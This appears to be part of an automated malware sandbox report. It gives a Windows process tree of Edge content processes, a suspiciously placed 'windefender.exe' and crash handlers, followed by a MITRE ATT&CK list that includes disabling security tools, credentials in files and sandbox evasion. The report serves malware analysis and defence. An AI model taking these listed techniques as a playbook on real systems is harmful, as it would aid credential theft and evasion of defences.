"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5244

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3a0
1⤵
PID:5664

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:4272

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4768

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4088

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5400

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4868

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8188

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:692

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7560

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3448
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3448 -s 3724
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:1864

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6360
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 6360 -s 3456
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:6824

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:432

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7212

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7712

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7596

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2836

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6860

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7340

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6996

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7640

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7484

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3936

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2612

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7644

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6628

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4192

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery